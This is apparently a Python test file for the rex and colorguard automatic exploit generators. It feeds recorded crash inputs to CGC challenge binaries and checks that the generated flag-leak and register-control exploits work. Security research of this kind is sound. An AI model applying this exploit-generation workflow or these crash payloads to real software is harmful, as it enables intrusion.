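def test_KPRCA_00057():
    """
    This test requires pointing an arbitrary transmit using atoi at the flag.

    Flow: replay the recorded crash under rex with the binary's own
    string<->integer conversion routines hooked, check that rex classifies
    the crash as an arbitrary transmit, ask it to point the transmit at the
    flag, then hand the first resulting leak to colorguard to build and run
    a PoV.
    """
    # Binary mode: the crash file is raw input for the target and must reach
    # it byte-for-byte.  Text mode could decode or newline-translate bytes in
    # a crash that is not valid text, changing what the binary actually sees.
    with open(os.path.join(tests_dir, "KPRCA_00057_crash"), "rb") as f:
        crash = f.read()

    # set up hooks for the binary's conversion / output routines
    format_infos = [
        FormatInfoStrToInt(0x8049e90, "based_atoi_8", str_arg_num=0, base=8, base_arg=None, allows_negative=False),
        FormatInfoStrToInt(0x804b3b0, "strtol", str_arg_num=0, base=None, base_arg=2, allows_negative=False),
        FormatInfoStrToInt(0x804b160, "strtol", str_arg_num=0, base=None, base_arg=2, allows_negative=False),
        # NOTE(review): 0x8049e90 is also the address hooked as based_atoi_8
        # above; two different functions cannot share an entry point, so one
        # of the two addresses looks like a copy-paste slip.  Confirm against
        # the binary's symbols before relying on either hook.
        FormatInfoDontConstrain(0x8049e90, "fdprintf", 1),
    ]

    binary = os.path.join(bin_location, "tests/cgc/KPRCA_00057")
    crash = rex.Crash(binary, crash, format_infos=format_infos)

    nose.tools.assert_true(crash.one_of(Vulnerability.ARBITRARY_TRANSMIT))

    # at least one way of steering the transmit at the flag must be found
    flag_leaks = list(crash.point_to_flag())
    nose.tools.assert_true(len(flag_leaks) >= 1)

    cg = colorguard.ColorGuard(binary, flag_leaks[0])
    cg.causes_leak()
    pov = cg.attempt_pov()
    nose.tools.assert_true(_do_pov_test(pov))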
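def symbol_to_format_info(addr, symbol):
    """
    Pick the FormatInfo hook that matches a symbol name.

    :param addr:   address the hook is installed at
    :param symbol: symbol name of the function at ``addr``
    :return: a ``FormatInfoStrToInt`` / ``FormatInfoIntToStr`` /
             ``FormatInfoDontConstrain`` instance, or ``None`` when the
             symbol is not one this helper knows how to hook
    :raises ValueError: for a ``based_atoi*`` symbol whose last ``_``-separated
             component is not an integer radix (e.g. ``based_atoi_signed``)
    """
    tokens = symbol.split("_")

    if symbol.startswith("atoi"):
        # only the "_no_signs" variant refuses a leading minus sign
        return FormatInfoStrToInt(addr, symbol, str_arg_num=0, base=10, base_arg=None,
                                  allows_negative="_no_signs" not in symbol)

    if symbol.startswith("based_atoi"):
        # The radix is the trailing "_<base>" component.  The "signed" marker
        # is matched as a whole token: a plain substring test would also fire
        # on "unsigned" and let the solver feed negative numbers to a parser
        # that rejects them, producing inputs the real binary never accepts.
        return FormatInfoStrToInt(addr, symbol, str_arg_num=0, base=int(tokens[-1]), base_arg=None,
                                  allows_negative="signed" in tokens)

    # int-to-string helpers differ only in which argument slot holds the
    # integer and which holds the destination buffer
    if symbol in ("int2str", "uint2str"):
        return FormatInfoIntToStr(addr, symbol, int_arg_num=2, str_dst_num=0, base=10, base_arg=None)
    if symbol in ("int2str_v2", "uint2str_v2"):
        return FormatInfoIntToStr(addr, symbol, int_arg_num=0, str_dst_num=1, base=10, base_arg=None)
    if symbol in ("int2str_v3", "uint2str_v3"):
        return FormatInfoIntToStr(addr, symbol, int_arg_num=1, str_dst_num=0, base=10, base_arg=None)

    if symbol.startswith("strtol"):
        # radix is not fixed by the name; base_arg=2 presumably points at the
        # call's third argument so it is read at run time
        return FormatInfoStrToInt(addr, symbol, str_arg_num=0, base=None, base_arg=2, allows_negative=True)

    if symbol == "printf":
        return FormatInfoDontConstrain(addr, symbol, check_symbolic_arg=0)
    if symbol == "fdprintf":
        return FormatInfoDontConstrain(addr, symbol, check_symbolic_arg=1)

    return None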
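def test_chall_resp_atoi():
    """
    Exploit a crash in a binary whose input handling goes through atoi and
    itoa, with both routines hooked so rex can reason about the conversions.

    Unlike the CGC tests, the hook addresses are resolved from the binary's
    CFG rather than hard-coded.  Every exploit rex produces, of either kind,
    must pass the PoV test.
    """
    crash_input = (
        '-435982256\n-439864843\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
        'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
    )
    # join the path like the other tests do instead of string concatenation
    bin_path = os.path.join(bin_location, "tests/i386/chall_resp_atoi")

    # resolve hook addresses from the binary's symbols
    cfg_fast = angr.Project(bin_path).analyses.CFGFast()
    atoi_addr = cfg_fast.functions["atoi"].addr
    itoa_addr = cfg_fast.functions["itoa"].addr

    f1 = FormatInfoIntToStr(addr=itoa_addr, func_name="itoa", int_arg_num=1, str_dst_num=0, base=10, base_arg=None)
    f2 = FormatInfoStrToInt(addr=atoi_addr, func_name="atoi", str_arg_num=0, base=10, base_arg=None, allows_negative=True)

    crash = rex.Crash(bin_path, crash=crash_input, format_infos=[f1, f2])
    exploit_f = crash.exploit()

    for e in exploit_f.register_setters:
        nose.tools.assert_true(_do_pov_test(e))
    for e in exploit_f.leakers:
        nose.tools.assert_true(_do_pov_test(e))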
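def test_cromu71():
    """
    Exploit a crash in CROMU_00071 with its based_atoi routine hooked and
    check that the best type-1 exploit rex generates actually works.
    """
    # NOTE(review): this literal carries bytes above 0x7f; under Python 3 a
    # str literal like this is text, not the raw bytes the target reads --
    # confirm the rex.Crash API in use accepts it unchanged.
    crash_input = 'feq\n &\x06\x00\x80\xee\xeen\nf\x00f_E_p\x00\x00\x80\x00q\n3&\x1b\x17/\x12\x1b\x1e]]]]]]]]]]]]]]]]]]]]\n\x1e\x7f\xffC^\n'
    binary = os.path.join(bin_location, "tests/cgc/CROMU_00071")

    # create format info for atoi
    format_infos = [
        FormatInfoStrToInt(0x804C500, "based_atoi_signed_10", str_arg_num=0, base=10, base_arg=None, allows_negative=True),
    ]

    # The hook list used to be built and then dropped on the floor, so the
    # atoi call ran unhooked; it is now passed in like in the other tests.
    # If exploit generation regresses here, the hook address 0x804C500 is
    # the first thing to re-check against the binary.
    crash = rex.Crash(binary, crash_input, format_infos=format_infos)

    # let's generate some exploits for it
    arsenal = crash.exploit()

    # make sure it works
    nose.tools.assert_true(_do_pov_test(arsenal.best_type1))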